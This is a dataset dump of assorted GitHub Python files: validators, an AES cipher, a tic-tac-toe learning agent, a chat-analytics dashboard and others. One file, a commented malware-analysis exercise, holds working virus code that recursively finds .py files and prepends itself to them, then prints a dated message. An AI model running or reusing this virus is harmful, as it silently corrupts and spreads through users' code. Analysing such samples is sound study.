seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42775151544 | from .models import (
ActionList,
Action,
ExpectList,
Expect,
ExportDict,
SkipIfList,
SkipIf,
)
from .validators import validate_boolean, validate_conditionals,validate_export_dict
class ArgType:
    """Base class for argument validators.

    Subclasses override ``type`` with a real converter/container and
    implement ``__call__`` to validate raw input; the converted result is
    cached on ``value`` while the raw input is returned to the caller.
    """

    # Identity converter by default; kept as a lambda so subclasses can
    # simply assign a class (e.g. ``type = str``) in its place.
    type = lambda value: value  # noqa
    # Cache for the last validated/converted value.
    value = None
class UsingArgType(ArgType):
    """Validator for the `using` argument.

    1. Check if value is a string
    2. Check if value is a namespace.collection
    3. Check if namespace.collection is installed
    """

    type = str

    def __call__(self, value) -> str:
        # Reject anything that is not a plain string up front.
        if not isinstance(value, str):
            raise ValueError(
                f"`using` must be a string, got {type(value).__name__}"
            )
        # Exactly one dot separates <namespace> from <collection>.
        if value.count(".") != 1:
            raise ValueError(
                f"`using` must be a <namespace>.<collection>, got {value}"
            )
        # TODO: Check if collection is installed
        self.value = self.type(value)
        return value
class ActionsArgType(ArgType):
    """Validator for the `actions` argument: a list of dict or string specs."""

    type = ActionList

    def __call__(self, actions) -> list:
        """
        1. Check if actions is a list
        2. For each action in actions
        2.1 Check if action is a dict or a str
        2.2 Create the action instance
        2.3 Add Action to return value
        """
        value = []
        if not isinstance(actions, list):
            # Build a helpful message suggesting the likely intended YAML form.
            msg = f"`actions` must be a list, got {type(actions).__name__}"
            if isinstance(actions, dict):
                msg += (
                    f" did you mean `- {list(actions.keys())[0]}:` ?"
                )
            if isinstance(actions, str):
                msg += f" did you mean `[{actions}]` or `- {actions}` ?"
            raise ValueError(msg)
        # Human-readable list of accepted Action keyword arguments.
        _valid = ", ".join(Action.Config.valid_ansible_arguments)
        for action in actions:
            if isinstance(action, dict):
                # ensure this is a single key-value pair
                if len(action) != 1:
                    raise ValueError(
                        f"`action` must be single key dictionary,"
                        f" got {action.keys()}"
                    )
                action_key = list(action.keys())[0]
                if "." not in action_key:
                    raise ValueError(
                        f"`action` must be <module>.<action>, got {action_key}"
                    )
                # NOTE(review): a key with more than one "." raises a bare
                # unpacking ValueError here rather than the friendly message
                # above — confirm whether multi-dot keys can occur.
                module_name, action_name = action_key.split(".")
                action_value = action[action_key]
                if not isinstance(action_value, dict):
                    raise ValueError(
                        f"`{action_key}:` takes"
                        " {param: value, ...},"
                        f" where `param` is one of {_valid}"
                        f", but got {action_value}"
                    )
                try:
                    # `action` is rebound from the raw dict to the model here.
                    action = Action(
                        module_name=module_name,
                        action_name=action_name,
                        **action_value,
                    )
                except TypeError as e:
                    # Unknown kwargs surface as TypeError; report which ones.
                    _invalid = set(action_value) - set(
                        Action.Config.valid_ansible_arguments
                    )
                    raise ValueError(
                        f"Unsupported parameters"
                        f" for `{action_key}: {_invalid}`"
                        f". Supported parameters include: {_valid}"
                    ) from e
            elif isinstance(action, str):
                # Shorthand form: "module.action" with no parameters.
                if "." not in action:
                    raise ValueError(
                        f"`action` must be <module>.<action>, got {action}"
                    )
                module, action_name = action.split(".")
                action = Action(module_name=module, action_name=action_name)
            else:
                raise ValueError(
                    f"`actions` must be a list of dicts"
                    f" or strings, got {type(action).__name__}"
                )
            value.append(action)
        # Cache the converted ActionList; the raw input is returned unchanged.
        self.value = self.type(value)
        return actions
class SkipifArgType(ArgType):
    """Validator for the `skipif` argument (a list of SkipIf conditionals)."""

    type = SkipIfList

    def __call__(self, value) -> list:
        """Validate `value` via the shared conditional validator.

        Fix: the return annotation said ``-> str`` but this method returns
        the conditional list unchanged, matching :class:`ExpectArgType`.
        """
        self.value = validate_conditionals(value, "skipif", SkipIf, self.type)
        return value
class ExpectArgType(ArgType):
    """Validator for the `expect` argument (a list of Expect conditionals)."""

    type = ExpectList

    def __call__(self, value) -> list:
        # Delegate to the shared conditional validator, cache, return input.
        validated = validate_conditionals(value, "expect", Expect, self.type)
        self.value = validated
        return value
class ExportArgType(ArgType):
    """Validator for the `export` argument (a mapping of exported names)."""

    type = ExportDict

    def __call__(self, value) -> dict:
        # Validate first, then wrap in the ExportDict container.
        checked = validate_export_dict(value)
        self.value = self.type(checked)
        return value
class RequiredArgType(ArgType):
    """Validator for boolean flag arguments such as `required`."""

    def __call__(self, value) -> bool:
        # Normalise to a boolean, cache it, and hand the input back.
        flag = validate_boolean(value)
        self.value = flag
        return value
| rochacbruno/ansible-test | ansible-test/plugins/module_utils/arg_types.py | arg_types.py | py | 4,795 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "models.ActionList",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "models.Action.Config",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "models.Action",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "models.Acti... |
32422202346 | import wolframalpha
import pprint
import json
class WolframAlpha:
    """Thin wrapper around the Wolfram|Alpha API for answering questions."""

    def __init__(self, appId):
        # API client authenticated with the given application id.
        self.__client = wolframalpha.Client(appId)
        self.__prettyPrinter = pprint.PrettyPrinter()
        self.__pp = self.__prettyPrinter.pprint

    def question(self, query):
        """Query Wolfram|Alpha and return the best plaintext answer.

        Returns canned fallback strings for empty queries, client errors,
        timeouts and unanswerable questions.
        """
        if len(query.strip()) == 0:
            return "Ask me a question."
        try:
            response = self.__client.query(query.strip())
        except Exception:
            return "Help! Tell SirDavidLudwig or Raine to fix me!"
        if response['@success'] == 'true':
            # Print the response to the terminal for debugging purposes.
            # Fix: the dumps() result was previously discarded, so nothing
            # was ever printed on the success path.
            try:
                print(json.dumps(response, indent=4))
            except Exception:
                # Response contains non-JSON-serializable values; dump raw.
                print(response)
            # Search for the primary pod and return its plaintext answer.
            for pod in response['pod']:
                if "@primary" in pod and pod["@primary"] == "true":
                    if isinstance(pod['subpod'], list):
                        return pod['subpod'][0]['plaintext']
                    return pod['subpod']['plaintext']
            # No primary pod: fall back to the first pod's first subpod.
            print("No primary found")
            return response['pod'][0]['subpod']['plaintext']
        elif '@timedout' in response:
            return "I cannot tell unfortunately."
        return "I'm sorry, I don't understand what you are asking me here."
| IntercraftMC/InterCraftBot_Deprecated | src/modules/wolframalpha.py | wolframalpha.py | py | 1,122 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "wolframalpha.Client",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pprint.PrettyPrinter",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 26,
"usage_type": "call"
}
] |
42366591652 | from email.mime import base
from AES_encipher import CTR_Mode
from OAEP import *
from RSA_key_gen import AES_key_gen
from utility import bit_size
import base64
from math import ceil
class data_msg:
    """ Class that holds the values used in the data transfer. """

    def __init__(self, signature: bytes = None, msg: bytes = None, symmetric_key: bytes = None, nonce_val: int = None):
        self.signature = signature
        self.msg = msg
        self.symmetric_key = symmetric_key
        self.nonce_val = nonce_val  # Used in the AES_CTR mode

    def from_base64(self, base64_str: str):
        """Populate this instance from the newline-separated base64 dump
        produced by :meth:`get_base64_encode` (field order must match
        the attribute assignment order in ``__init__``)."""
        dm = data_msg()
        d = vars(dm)
        lines = base64_str.split('\n')
        idx = 0
        for k in d.keys():
            # One base64 line per attribute, decoded back to raw bytes.
            d[k] = base64.b64decode(lines[idx])
            idx += 1
        self.__dict__ = d
        # The nonce travels as big-endian bytes; restore the integer form.
        self.nonce_val = int.from_bytes(self.nonce_val, byteorder='big')

    def int_to_byte(self, val):
        """Return ``val`` as big-endian bytes; bytes pass through unchanged."""
        # Fix: use isinstance instead of `type(val) != type(bytes())`.
        if not isinstance(val, bytes):
            l = ceil(bit_size(val) / 8)
            val = val.to_bytes(length=l, byteorder='big')
        return val

    def get_base64_encode(self):
        """Serialize every field as one base64 line (newline-terminated),
        restoring ``nonce_val`` to an int before returning."""
        self.nonce_val = self.int_to_byte(self.nonce_val)
        my_vars = vars(self)
        result = str()
        for v in my_vars.values():
            # Fix: `is None` instead of `== None`; unset fields encode as
            # an empty base64 line.
            if v is None:
                result += base64.b64encode(bytes()).decode('utf-8') + '\n'
            else:
                result += base64.b64encode(v).decode('utf-8') + '\n'
        self.nonce_val = int.from_bytes(self.nonce_val, byteorder='big')
        return result
class AES_message_cipher:
    """ Does the ciphering of a message, in bytes, of any size. """

    def __init__(self, key_bit_size = 128):
        # AES block size, in bytes.
        self.__block_count__ = 16
        # Generate a fresh symmetric key and store it as big-endian bytes.
        kg = AES_key_gen(key_bit_size)
        self.key = kg.generate_key()
        self.key = self.key.to_bytes(length=kg.bit_size // 8, byteorder='big')

    def encrypt(self, msg: bytes):
        """Encrypt `msg` block-by-block in CTR mode.

        Returns a data_msg carrying the ciphertext, the symmetric key and
        the CTR nonce needed for decryption.
        """
        blocks_count = ceil(len(msg) / self.__block_count__)
        dm = data_msg()
        cipher_blocks = []
        cipher = CTR_Mode(self.key)
        for i in range(blocks_count):
            idx = i * self.__block_count__
            # The final block may be shorter than 16 bytes.
            if i == blocks_count - 1:
                b = msg[idx:]
            else:
                b = msg[idx:idx + self.__block_count__]
            b = cipher.encrypt_block(data=b)
            # `b` is bytes, so += extends the list with its individual
            # integer byte values; bytes() below reassembles them.
            cipher_blocks += (b)
        cipher_blocks = bytes(cipher_blocks)
        dm.msg = cipher_blocks
        dm.symmetric_key = self.key
        # The nonce must travel with the message for CTR decryption.
        dm.nonce_val = cipher.nonce
        return dm
class AES_message_decipher:
    """ Deciphers a message, in bytes, of any size. """

    def __init__(self):
        # AES block size, in bytes.
        self.__block_count__ = 16

    def decrypt(self, dm: data_msg):
        """Decrypt dm.msg block-by-block using the key and nonce in `dm`."""
        blocks_count = ceil(len(dm.msg) / self.__block_count__)
        # Re-create the CTR keystream from the transported key and nonce.
        cipher = CTR_Mode(dm.symmetric_key, nonce=dm.nonce_val)
        msg = []
        for i in range(blocks_count):
            idx = i * self.__block_count__
            # The final block may be shorter than 16 bytes.
            if i == blocks_count - 1:
                b = dm.msg[idx:]
            else:
                b = dm.msg[idx:idx + self.__block_count__]
            b = cipher.decrypt_block(b)
            # Extend with individual byte values; bytes() reassembles below.
            msg += b
        msg = bytes(msg)
        return msg
{
"api_name": "base64.b64decode",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "math.ceil",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "utility.bit_size",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "base64.b64encode",
"l... |
75220903145 | import argparse
from . import test_data
from .. import music
from .. import key_recognition
def parse_args():
    """Build and evaluate the CLI parser for the key-recognition test."""
    arg_parser = argparse.ArgumentParser(
        description='Test getting key from sounds')
    arg_parser.add_argument('--verbose_factor_threshold', '-Vft',
                            type=float,
                            required=False,
                            help='Color red and print full mismatches list for tests with match factor lesser than VERBOSE_FACTOR_THRESHOLD')  # noqa
    arg_parser.add_argument('--verbose_duration_threshold', '-Vdt',
                            type=float,
                            required=False,
                            help='Print only mismatches with duration greater than VERBOSE_DURATION_THRESHOLD')  # noqa
    return arg_parser.parse_args()
class Mismatch(music.Key):
    """A key-recognition mismatch: computed key vs. model key over a span."""

    def __init__(self, note_computed, note_model, kind_computed, kind_model,
                 timestamp, duration_ms):
        super().__init__(note_computed, timestamp, duration_ms, kind_computed)
        self.note_model = note_model
        self.kind_model = kind_model

    @property
    def key_model(self):
        """Expected key rendered as `<note symbol>-<kind>`."""
        if self.note_model is None:
            symbol = 'None'
        else:
            symbol = ('C', 'C#', 'D', 'D#', 'E',
                      'F', 'F#', 'G', 'G#', 'A', 'A#', 'H')[self.note_model]
        return f"{symbol}-{self.kind_model}"

    def __str__(self):
        span = f"{round(self.timestamp, 3)} - {round(self.end_timestamp, 3)}"
        return f"{span}: Expected {self.key_model}, got {super().__str__()}"  # noqa
def run_tests():
    """Run key recognition on every test model and print colored results."""
    # Fix: parse_args() was called twice, re-parsing sys.argv once per
    # option; parse once and read both attributes.
    args = parse_args()
    verbose_factor_threshold = args.verbose_factor_threshold
    verbose_duration_threshold = args.verbose_duration_threshold
    if verbose_factor_threshold is None:
        verbose_factor_threshold = 0.5
    if verbose_duration_threshold is None:
        verbose_duration_threshold = 0.1
    # NOTE(review): the thresholds are currently never read below —
    # presumably intended for the verbose mismatch output.
    tests = test_data.get_all_test_models()
    print("-----------TONATIONS TEST-----------------")
    for test in tests:
        key = key_recognition.get_key(test.sounds)
        match = key == test.key
        if match:
            # Green for a match, red for a mismatch (ANSI escapes).
            color = '\033[92m'
            print(f"{test.file_path}: {color} {key} matches {test.key} \033[0m")  # noqa
        else:
            color = '\033[91m'
            print(f"{test.file_path}: {color}{key} doesn't match {test.key} \033[0m")  # noqa
| JakubBilski/tonations-recognition | src/tests/key_from_sounds_test.py | key_from_sounds_test.py | py | 2,381 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
}
] |
23403442036 | import random
import pygame
from pygame.locals import *
import logging
import numpy as np
import itertools
# logging.basicConfig(filename = 'Result.log', level=logging.INFO)
# copy Rohit Agrawal's work and modify for py_game version. It doesn't work really well but the concept has been applied.
pygame.init()
# Colour constants (RGB).
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
# Window geometry: a 300x300 surface split into a 3x3 grid of 100px cells.
width = 300
height = 300
line_width = 6
font = pygame.font.SysFont(None, 20)
screen = pygame.display.set_mode((width, height))
# Board state: 0 = empty, 1 = human player (X), -1 = AI player (O).
markers = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
clicked = False  # True between mouse-down and mouse-up
pos = []  # last mouse click position
player = 1  # whose turn: 1 = human, -1 = AI
winner = 0  # 0 = no winner yet, 1 = player one, 2 = player two
game_over = False
again_rect = Rect(width//2 - 80, height//2, 160, 50)  # "Play Again?" button
win = [0, 0]  # win counters: [player one, player two]
totalgame = 0
win_text = ''
winrateCalculated = False  # guards draw_winner from double-counting a game
states_dict = {}  # filled later: state index -> 3x3 board
def copy_game_state(state):
    """Return an independent copy of the 3x3 board (rows are not aliased)."""
    return [list(row) for row in state]
def play_move(state, player, block_num):
    """Place `player`'s mark in cell `block_num` (1-9, row-major) if empty."""
    row, col = divmod(block_num - 1, 3)
    if state[row][col] == 0:
        state[row][col] = player
def draw_grid():
    """Clear the window and draw the two horizontal and two vertical grid lines."""
    gr = (50, 50, 50)  # grid line colour
    bg = (255, 255, 200)  # background colour
    screen.fill(bg)
    # One pass draws both the horizontal and the vertical line at 1/3, 2/3.
    for x in range(1, 3):
        pygame.draw.line(screen, gr, (0, x*(width/3)), (width, x * (width/3)), line_width)
        pygame.draw.line(screen, gr, (x*(height/3), 0), (x * (height/3), height), line_width)
def draw_marker():
    """Draw an X (value 1, green) or O (value -1, red) for every marked cell."""
    x_pos = 0  # row index into `markers`
    for x in markers:
        y_pos = 0  # column index
        for y in x:
            if y == 1:
                # X: two crossing diagonals inset 15px inside the 100px cell.
                pygame.draw.line(screen, GREEN, (y_pos*100+15, x_pos*100+15), (y_pos*100+85, x_pos*100+85))
                pygame.draw.line(screen, GREEN, (y_pos*100+15, x_pos*100+85), (y_pos*100+85, x_pos*100+15))
            if y == -1:
                # O: circle of radius 30 centred in the cell.
                pygame.draw.circle(screen, RED, (y_pos*100+50, x_pos*100+50), 30, line_width)
            y_pos += 1
        x_pos += 1
def check_winner():
    """Scan `markers` for a completed line and set the global result flags.

    Side effects: sets `winner` (1 when three 1s line up, 2 when three -1s
    line up) and `game_over`.
    """
    global winner
    global game_over
    y_pos = 0  # doubles as the column index while iterating the rows
    for x in markers:
        # Row check: three 1s sum to 3, three -1s sum to -3.
        if sum(x) == 3:
            winner = 1
            game_over = True
        if sum(x) == -3:
            winner = 2
            game_over = True
        # Column check for column `y_pos`.
        if markers[0][y_pos] + markers[1][y_pos] + markers[2][y_pos] == 3:
            winner = 1
            game_over = True
        if markers[0][y_pos] + markers[1][y_pos] + markers[2][y_pos] == -3:
            winner = 2
            game_over = True
        y_pos += 1
    # Both diagonals.
    if markers[0][0] + markers[1][1] + markers[2][2] == 3 or markers[2][0] + markers[1][1] + markers[0][2] == 3:
        winner = 1
        game_over = True
    if markers[0][0] + markers[1][1] + markers[2][2] == -3 or markers[2][0] + markers[1][1] + markers[0][2] == -3:
        winner = 2
        game_over = True
def draw_winner(winner):
    """Render the result banner and Play Again button; tally the result once.

    `winrateCalculated` ensures the counters update only once per finished
    game even though this is called every frame while game_over is True.
    NOTE(review): it is never reset to False by the Play Again handler, so
    subsequent games are not counted — confirm intended.
    """
    global totalgame, win_text, winrateCalculated
    if winner == 0 and winrateCalculated == False:
        totalgame += 1
        win_text = 'Draw!'
    else:
        if winner == 1 and winrateCalculated == False:
            totalgame += 1
            win[0] += 1
            # NOTE(review): winrate1 is computed but never used.
            winrate1 = str((win[0]/totalgame)*100)
            win_text = 'Player 1 wins!'
            logging.info(win_text)
        if winner == 2 and winrateCalculated == False:
            totalgame += 1
            win[1] += 1
            # NOTE(review): winrate2 is computed but never used.
            winrate2 = str((win[1]/totalgame)*100)
            win_text = 'Player 2 wins!'
            logging.info(win_text)
    # Result banner.
    win_img = font.render(win_text, True, BLUE)
    pygame.draw.rect(screen, GREEN, (width//2 - 100, height//2 - 60, 200, 50))
    screen.blit(win_img, (width//2 - 100, height//2 - 50))
    # "Play Again?" button inside again_rect.
    again_text = 'Play Again?'
    again_img = font.render(again_text, True, BLUE)
    pygame.draw.rect(screen, GREEN, again_rect)
    screen.blit(again_img, (width//2 - 80, height//2 + 10))
    winrateCalculated = True
def getBestMove(state, player):
    '''
    Reinforcement Learning Algorithm: pick the empty cell (1-9) whose
    resulting board has the highest learned state value for `player`.
    Returns -1 when the board is full (no move possible).
    '''
    moves = []
    curr_state_values = []
    empty_cells = []
    # Find all empty cells, numbered 1..9 row-major.
    for i in range(3):
        for j in range(3):
            if state[i][j] == 0:
                empty_cells.append(i*3 + (j+1))
    if not empty_cells:
        return -1
    for empty_cell in empty_cells:
        moves.append(empty_cell)
        # Simulate the candidate move on a copy of the board.
        new_state = copy_game_state(state)
        play_move(new_state, player, empty_cell)
        # NOTE(review): linear scan over all 3^9 boards per candidate move;
        # a precomputed reverse map (board tuple -> index) would be faster.
        next_state_idx = list(states_dict.keys())[list(states_dict.values()).index(new_state)]
        curr_state_values.append(state_values_for_AI[next_state_idx])
        print('next state value', state_values_for_AI[next_state_idx])
    print('Possible moves = ' + str(moves))
    print('Move values = ' + str(curr_state_values))
    print('markers:', markers)
    # Greedy policy: choose the highest-valued successor state.
    best_move_idx = np.argmax(curr_state_values)
    best_move = moves[best_move_idx]
    return best_move
def print_board(game_state):
    """Print the 3x3 board to stdout with ASCII framing."""
    divider = '----------------'
    print(divider)
    for row in game_state:
        print('| ' + ' || '.join(str(cell) for cell in row) + ' |')
        print(divider)
# LOAD TRAINED STATE VALUES: one learned value per enumerated board state.
state_values_for_AI = np.loadtxt('trained_state_values_O.txt', dtype=np.float64)
players = [1, -1, 0]  # cell states: X, O, empty
states_dict = {}
# Enumerate every 3^9 = 19683 board configuration as a 3x3 nested list.
all_possible_states = [[list(i[0:3]), list(i[3:6]), list(i[6:10])] for i in itertools.product(players, repeat=9)]
n_states = len(all_possible_states)
n_actions = 9  # 9 spaces
# Map index -> board; getBestMove reverse-looks-up boards in this dict.
for i in range(n_states):
    states_dict[i] = all_possible_states[i]
run = True
while run:
    # Redraw the board every frame.
    draw_grid()
    draw_marker()
    draw = 0  # NOTE(review): assigned but never read
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            run = False
        if game_over == 0:
            if event.type == pygame.MOUSEBUTTONDOWN:
                clicked = True
            if event.type == pygame.MOUSEBUTTONUP and clicked == True:
                clicked = False
                pos = pygame.mouse.get_pos()
                # pos is (x, y): the row comes from y, the column from x.
                cell_x = pos[1]
                cell_y = pos[0]
                print(cell_x//100, cell_y//100)
                # Human move: claim the clicked 100px cell if it is empty.
                if markers[cell_x//100][cell_y//100] == 0:
                    markers[cell_x//100][cell_y//100] = player
                    player *= -1
                    check_winner()
                # AI move (player -1) chosen from the learned state values.
                if player == -1 and game_over == False:
                    smartMove = getBestMove(markers, -1)
                    print(smartMove)
                    if smartMove == -1:
                        # Board full: draw.
                        player = 0
                        game_over = True
                    else:
                        # NOTE(review): row/column order here is transposed
                        # relative to play_move()'s indexing — confirm intended.
                        markers[(smartMove-1)%3][int((smartMove-1)/3)] = player
                        print_board(markers)
                        player *= -1
                        check_winner()
        if game_over == True:
            draw_winner(winner)
            # A click inside the "Play Again?" button resets the game state.
            if event.type == pygame.MOUSEBUTTONDOWN:
                clicked = True
            if event.type == pygame.MOUSEBUTTONUP and clicked == True:
                pos = pygame.mouse.get_pos()
                if again_rect.collidepoint(pos):
                    markers = []
                    pos = []
                    player = 1
                    winner = 0
                    game_over = False
                    for x in range(3):
                        row = [0]*3
                        markers.append(row)
    pygame.display.update()
pygame.quit()
{
"api_name": "pygame.init",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pygame.font.SysFont",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "pygame.display.set_m... |
73065938023 | # Script: 14 - Python Malware Analysis
# Author: Robert Gregor
# Date of latest revision: 302030FMAR23
# Objectives
# Perform an analysis of the Python-based code given below
# Insert comments into each line of the script explaining in your own words what the virus is doing on this line
# Insert comments above each function explaining what the purpose of this function is and what it hopes to carry out
# Insert comments above the final three lines explaining how the functions are called and what this script appears to do
# My Sources:
# [Python | os.listdir() method](https://www.geeksforgeeks.org/python-os-listdir-method/)
# [Python For Loops](https://www.w3schools.com/python/python_for_loops.asp)
# [Python | os.path.isdir() method](https://www.geeksforgeeks.org/python-os-path-isdir-method/)
# [Python List extend()](https://www.programiz.com/python-programming/methods/list/extend)
# [Python break statement](https://www.tutorialspoint.com/python/python_break_statement.htm)
# [Python: os.path.abspath() method with example](https://www.geeksforgeeks.org/python-os-path-abspath-method-with-example/)
# [Python File close() Method](https://www.tutorialspoint.com/python/file_close.htm)
# [Python File Write](https://www.w3schools.com/python/python_file_write.asp)
# Main
#!/usr/bin/python3
# Imports os and datetime modules
import os
import datetime
# Sets the SIGNATURE variable equal to the string VIRUS
SIGNATURE = "VIRUS"
# Function takes path variable as parameter and searches for files to target
def locate(path):
    """Recursively collect paths of .py files under `path` that do not yet
    contain the SIGNATURE marker (i.e. are not yet infected)."""
    files_targeted = []
    # All files and directories directly under `path`.
    filelist = os.listdir(path)
    for fname in filelist:
        # Recurse into subdirectories and merge their results.
        if os.path.isdir(path+"/"+fname):
            files_targeted.extend(locate(path+"/"+fname))
        # Only Python source files are candidates.
        elif fname[-3:] == ".py":
            infected = False
            # Presence of the marker string means the payload is already there.
            for line in open(path+"/"+fname):
                if SIGNATURE in line:
                    infected = True
                    break
            # NOTE(review): the file handle opened above is never explicitly
            # closed; use a `with` block.
            if infected == False:
                files_targeted.append(path+"/"+fname)
    # Return all files that are not yet infected.
    return files_targeted
# Function used to infect all files identified by locate function
def infect(files_targeted):
    """Prepend the first 39 lines of this script (the payload) to each
    target file, overwriting the target in place."""
    # Open this very script to read its own source.
    virus = open(os.path.abspath(__file__))
    virusstring = ""
    # Copy only lines 0-38: the payload body, excluding anything after it.
    for i, line in enumerate(virus):
        if 0 <= i < 39:
            virusstring += line
    # NOTE(review): `virus.close` is missing parentheses — the method is
    # referenced, not called, so the file is never actually closed here.
    virus.close
    for fname in files_targeted:
        # Read the target's current contents.
        f = open(fname)
        temp = f.read()
        f.close()
        # Rewrite the target with the payload prepended.
        f = open(fname, "w")
        f.write(virusstring + temp)
        f.close()
# Function used to print "You have been hacked" at a specified time
def detonate():
    """Print the payload message, but only when the date is May 9th."""
    # Trigger condition: current month is May (5) and day-of-month is 9.
    if datetime.datetime.now().month == 5 and datetime.datetime.now().day == 9:
        print("You have been hacked")
# Declares file_targeted variable equal to current directory files
# Collect all not-yet-infected .py files under the current directory,
# prepend the payload to each, then fire the date-triggered message.
files_targeted = locate(os.path.abspath(""))
infect(files_targeted)
detonate()
# End | RobG-11/Ops301-Code-Challenges | 14_malware_analysis.py | 14_malware_analysis.py | py | 4,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_num... |
30332494769 | import streamlit as st
import pandas as pd
import numpy as np
import re
import emoji
import io
from collections import Counter
import datetime
import plotly.express as px
from numpy import random
from multiprocessing.dummy import Pool as ThreadPool
from wordcloud import WordCloud, STOPWORDS
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import matplotlib.pyplot as plt
from deep_translator import GoogleTranslator
from helper import *
# --- Page setup -------------------------------------------------------------
st.set_page_config(
    page_title="Chat Analytics Dashboard",
    page_icon="🔍",
    layout="wide")
# Styling the Structure: hide Streamlit's default menu and footer chrome.
# https://share.streamlit.io/rawrapter/chat-analytics-dashboard/main/chat_analyze.py
hide_streamlit_style = """
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
"""
st.markdown(hide_streamlit_style, unsafe_allow_html=True)
st.title("Chat Analytics Dashboard")
st.markdown('<small>Made with ♥ in India. © <b>Anant Arun</b></small>', unsafe_allow_html=True)
# translator = GoogleTranslator(source='auto', target='en')
# VADER analyzer used later for per-message sentiment scoring.
sid_obj = SentimentIntensityAnalyzer()
pool = ThreadPool(8)  # thread pool for parallel translation requests
stopwords = set(STOPWORDS)
with st.expander("How to export your Conversation"):
    st.write("""To export a copy of the history of an individual chat or group:
\n1. Open the conversation or group.
\n2. For Android: Click on three vertical dots on top right corner and select More. \nFor iOS: Tap on Contact/Group Name.
\n3. Select Export chat.
\n4. Choose Without Media.
\n5. You will asked how to save your chat history attached as a .txt document. \nSave it wherever you like. Then download the .txt file and upload it below.""")
# Chat export upload; the raw export is read as a list of text lines.
chat_file = st.file_uploader("Upload chat file (Don't worry your data is safe. Analysis is done in your browser only.)", type=["txt"])
chat_content = []
if chat_file != None:
    raw_text = io.TextIOWrapper(chat_file, encoding='utf-8')
    chat_content = raw_text.readlines()
def translate_request(text):
    """Translate one message to English and drop stopwords.

    Returns None when the translator yields nothing; callers must be
    None-safe. Uses the module-level `stopwords` set.
    """
    translate_text = GoogleTranslator(target='en').translate(text.strip().lower())
    if translate_text != None:
        translate_text = " ".join(word for word in translate_text.split(" ") if word not in stopwords)
    return translate_text
def list_to_DF(list, format=0):
    """Parse raw WhatsApp export lines into a DataFrame.

    Each line starting with a date becomes a row (date_time, author,
    message); continuation lines are glued onto the previous message.
    On a date-format mismatch the whole parse is retried with the next
    format in `date_format`.
    """
    date_format = ['%d/%m/%Y, %I:%M %p', '%d/%m/%y, %I:%M %p', '%m/%d/%y, %I:%M %p']
    date = re.compile(r'\d{1,2}/\d{1,2}/\d{2,4}')
    # Collect rows in a plain list and build the frame once at the end:
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0,
    # and appending row-by-row was quadratic anyway.
    rows = []
    for chat in list:
        if date.match(chat):
            dat_time, conversation = re.split(' - ', chat, maxsplit=1)
            try:
                aut, msg = re.split(':', conversation, maxsplit=1)
            except ValueError:
                # System messages carry no "author:" prefix.
                aut = np.nan
                msg = str.strip(conversation)
            try:
                dt = datetime.datetime.strptime(str.strip(dat_time), date_format[format])
            except ValueError:
                # Wrong date layout: retry the full parse with the next format.
                return list_to_DF(list, format + 1)
            rows.append({'date_time': dt, 'author': aut, 'message': str.strip(msg)})
        else:
            # Continuation of a multi-line message.
            rows[-1]['message'] = rows[-1]['message'] + ' ' + chat
    return pd.DataFrame(rows, columns=['date_time', 'author', 'message'])
def data_preperation(df):
    """Add derived per-message columns (date parts, emoji, media/url flags)
    to `df` in place and return it."""
    year = lambda x: x.year
    # Pull every emoji character out of a message.
    # NOTE(review): emoji.get_emoji_regexp() was removed in emoji>=2.0 —
    # pin `emoji<2` or migrate to emoji.emoji_list(); confirm the pinned
    # version.
    emoji_extract = lambda x: ''.join(re.findall(emoji.get_emoji_regexp(), x))
    url_pattern = r'(https?://\S+)'
    df.dropna(inplace=True)
    # Calendar breakdowns of the timestamp.
    df['date'] = df['date_time'].apply(pd.Timestamp.date)
    df['day'] = df['date_time'].apply(pd.Timestamp.day_name)
    df['month'] = df['date_time'].apply(pd.Timestamp.month_name)
    df['year'] = df['date_time'].apply(year)
    # 12-hour clock string, e.g. "09:05 AM".
    df['time'] = df['date_time'].apply(pd.Timestamp.time).apply(lambda x: datetime.datetime.strptime(str(x), "%H:%M:%S")).apply(lambda x: x.strftime("%I:%M %p"))
    df['emoji_used'] = df.message.apply(emoji_extract)
    # WhatsApp placeholder left behind for stripped attachments.
    df['Media'] = df.message.str.contains('<Media omitted>')
    df['urlcount'] = df.message.apply(lambda x: re.findall(url_pattern, x)).str.len()
    return df
if chat_content != []:
    # Parse the raw export and enrich it with derived columns.
    df = list_to_DF(chat_content)
    df = data_preperation(df)
    # --- Headline stats -----------------------------------------------------
    st.subheader("Conversation Stats")
    st.write("\n")
    st.write("Total Text Messages: ", df.shape[0])
    st.write("Total Media Messages: ", df[df['Media']].shape[0])
    st.write("Total Emojis: ", sum(df['emoji_used'].str.len()))
    st.write("Total Links/URLs: ", np.sum(df.urlcount))
    # Separate media placeholders from real text messages.
    media_messages_df = df[df['message'] == '<Media omitted>']
    messages_df = df.drop(media_messages_df.index)
    # --- Per-author participation bar chart ---------------------------------
